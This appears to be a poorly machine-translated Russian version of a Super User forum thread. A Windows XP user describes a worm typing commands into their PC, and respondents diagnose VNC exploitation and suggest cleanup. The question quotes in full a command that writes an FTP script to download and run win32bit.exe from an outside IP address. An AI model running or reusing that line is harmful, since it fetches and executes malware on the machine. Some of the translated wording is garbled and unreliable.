Моя система ведет себя странно, действительно ли возможно, что у меня есть вирус?
В течение прошлых двух дней я испытываю странное поведение в своем компьютере, который я сильно подозреваю, вирус. Таким образом внезапный, серия событий клавиатуры принимает участие в. Это пытается открыть командную строку и попытаться выполнить следующую строку: del eq&echo open 186.81.185.135 14062 >> eq&echo user 12120 17227 >> eq &echo get win32bit.exe >> eq &echo quit >> eq &ftp -n -s:eq &win32bit.exe &del eq Это - XP SP3 Победы, на который я воздействую, и у меня есть выполнение McAfee. Какое-либо тело имеет какую-либо идею, каково это было бы?
7 ответов
Выполненный Антивирус Malwarebytes. Можно получить его здесь. Вы можете удалять его с этим. Если не затем формат и перезагрузка являются самыми быстрыми, easist способ вычистить систему. Помимо хорошей перезагрузки время от времени поддерживает ОС в рабочем состоянии хорошо. Надежда, которая помогает.
-
1, кроме того, если malwarebytes отказывается можно устанавливать, существует хороший шанс системы, на самом деле имеющей вирус. – Journeyman Geek♦ 10.09.2009, 10:06
если Вы, обычный вирусный сканер не берет угрозу (известный или неизвестный) это не означает, что это не реально. дайте Threatfire попытку, anitvirus программа, которая не полагается на вирусные подписи, но на анализе на поведенческом уровне
-
1
Я рекомендовал бы Spybot Search & Destroy.
Проверьте то, что делает Ваш сетевой трафик. Вы можете использовать это, чтобы выяснить, является ли это удаленным сеансом или троянцем с дистанционным управлением.
Можно также смочь контролировать, какой исполняемый файл работает в Диспетчере задач на основе Байтов Чтения и Байтов Записи, также. Это - то, как я поймал ошибку в своей системе.
Да, Вы были скомпрометированы. Если у Вас нет экспертных знаний, чтобы полностью диагностировать и восстановить троянцев и руткиты, единственный безопасный способ продолжиться состоит в том, чтобы переустановить ОС. Весело провести время.
Сегодняшние антивирусные средства не до задания защиты Вас от обширного разнообразия и быстрых мутаций угроз, которые являются общими сегодня. Особенно традиционные основанные на подписи сканеры в значительной степени бесполезны. Не полагайте, что Ваша машина является чистой просто, потому что существует заверяющий небольшой значок, находящийся в Вашем системном лотке и съедающий половину Вашего ЦП.
Сегодня, этот очень IP-адрес, кажется, является динамичным, который кажется нечетным для его цели.
$ роют-x 186.81.185.135
[..]
135.185.81.186.in-addr.arpa. 86400 В PTR Dynamic-IP-18681185135.cable.net.co.
[..]
Однако это может на самом деле быть довольно старо, также - Ваш вирусный сканер действительно работает...?
Править: вчера, поиск 186.81.185.135 только дал 1 результат, сегодня 2 (плюс этот вопрос о Суперпользователе сам)... Возможно, будьте довольно недавними, в конце концов?
У Вас, вероятно, есть VNC настроенным, не так ли? И по всей вероятности Вы не настроили пароль для него, не так ли? Это - то, как червь пытался войти в Ваш компьютер. Эти 186.81.185.135 хостов не важны, поскольку это по всей вероятности - другая бедняга, кто не настроил VNC правильно.
Червь пытается создать сценарий для ftp, чтобы загрузить win32bit.exe и выполнить его, когда это готово.
При выполнении некоторого анти-... рекомендуется сканер, поскольку трудно определить, успешно выполнилось ли это или нет.
Является Ваша система актуальным patchwise? Не повредило бы удостоверяться, что у Вас есть все последние и самые большие от Microsoft включая Средство удаления Вредоносного программного обеспечения в течение этого месяца. Это может найти и удалить то, что Вы имеете. Все отмеченные инструменты шпионского ПО выше являются превосходными опциями также (мне нравится Malwarebytes),